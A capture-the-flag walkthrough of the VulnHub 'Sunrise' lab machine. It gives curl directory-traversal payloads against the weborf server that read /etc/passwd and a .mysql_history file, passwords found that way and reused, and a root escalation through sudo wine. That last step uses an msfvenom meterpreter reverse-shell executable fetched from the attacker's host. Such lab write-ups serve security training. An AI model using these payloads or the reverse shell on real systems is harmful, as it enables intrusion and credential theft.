Vulnhub: Sunrise
This is a beginner-level machine part of the sunset series from vulnhub. I would definitely recommend it, it will expose you to some interesting skills/concepts
Scanning:
Finding the machine on the network using nmap:
crazyeights@es-base:~$ nmap -PS 192.168.56.1-255
Nmap scan report for 192.168.56.135
Host is up (0.00014s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Getting more details about running services:
crazyeights@es-base:~$ nmap -A -p- 192.168.56.135
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-07 13:32 EST
Nmap scan report for 192.168.56.135
Host is up (0.000067s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '192.168.56.1' is not allowed to connect to this MariaDB server
8080/tcp open http-proxy Weborf (GNU/Linux)
| fingerprint-strings:
Web:
I always check web first
Here is the index page:
On port 8080, we find weborf running:
The weborf web application might have vulnerabilities
Searching for exploits using searchsploit:
crazyeights@es-base:~$ searchsploit weborf
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
weborf 0.12.2 - Directory Traversal | linux/remote/14925.txt
Weborf HTTP Server - Denial of Service | multiple/dos/14012.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Proof of Concept for the Directory Traversal vulnerability:
Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
Testing it out using the same command gives us the contents of /etc/passwd:
crazyeights@es-base:~$ curl http://192.168.56.135:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[SNIP]
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
[SNIP]
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
mysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false
crazyeights@es-base:~$
- There are two users with home folders: weborf and sunrise
- When we checkout the content of sunrises home directory we can see the user flag: (cleaned up for clarity)
crazyeights@es-base:~$ curl http://192.168.56.135:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
[SNIP]
user.txt
Getting the user flag:
crazyeights@es-base:~$ curl http://192.168.56.135:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
a6050aecf6303b0b824038807d823a89
There is much less in the weborf home folder, only the weborf application directory (cleaned up for clarity)
crazyeights@es-base:~$ curl http://192.168.56.135:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f
weborf-0.12.2/
Since we cannot see hidden files or folders (beginning with ., ie. .ssh) we use dirb to look for them:
crazyeights@es-base:~$ dirb http://192.168.56.135:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f
---- Scanning URL: http://192.168.56.135:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/ ----
+ http://192.168.56.135:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.bashrc (CODE:200|SIZE:3526)
+ http://192.168.56.135:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history (CODE:200|SIZE:83)
[SNIP]
- We find interesting file: .mysql_history
- When getting its contents we find the sql password for the user weborf:
crazyeights@es-base:~$ curl http://192.168.56.135:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history
show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
User:
It is also the password for SSH:
crazyeights@es-base:~$ ssh weborf@192.168.56.135
weborf@192.168.56.135's password:
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 5 16:24:32 2019 from 192.168.1.146
weborf@sunrise:~$
- Check for additional user information in mysql since we know the password for the user weborf:
- Using the database mysql, and the table user, the user sunrise has their password stored in plaintext:
weborf@sunrise:~$ mysql -u weborf -p'iheartrainbows44'
[SNIP]
| localhost | sunrise | thefutureissobrightigottawearshades | N | N | N
[SNIP]
MariaDB [mysql]>
Login as the user sunrise:
weborf@sunrise:~$ su sunrise
Password:
sunrise@sunrise:/home/weborf$
Root:
Find programs the user sunrise can run with elevated privileges:
sunrise@sunrise:/home/weborf$ sudo -l
[sudo] password for sunrise:
Matching Defaults entries for sunrise on sunrise:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sunrise may run the following commands on sunrise:
(root) /usr/bin/wine
-
The user sunrise can run the wine command (windows emulator) with root privileges
-
Use msfvenom to create an executable containing a reverse shell:
crazyeights@es-base:~$ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.1 lport=1234 -f exe >evil.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
crazyeights@es-base:~$
Copy the exe to http server:
crazyeights@es-base:~$ sudo cp evil.exe /var/www/html/
[sudo] password for crazyeights:
crazyeights@es-base:~$ sudo service apache2 start
crazyeights@es-base:~$
Download on the target machine:
sunrise@sunrise:/tmp$ wget http://192.168.56.1/evil.exe
Using msf with multi/handler for the listener, set the listening host, and port and run:
msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > run
Run the exploit using wine as root:
sunrise@sunrise:/tmp$ sudo /usr/bin/wine evil.exe
The reverse shell will connect to the listener, and we now have root privileges:
[*] Started reverse TCP handler on 192.168.56.1:1234
[*] Sending stage (176195 bytes) to 192.168.56.135
[*] Meterpreter session 1 opened (192.168.56.1:1234 -> 192.168.56.135:41564) at 2021-01-07 14:17:27 -0500
Checking uid:
meterpreter > getuid
Server username: sunrise\root
Get flag root/root.txt
meterpreter > cat root.txt
[SNIP]
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
24edb59d21c273c033aa6f1689b0b18c
meterpreter >
FIN.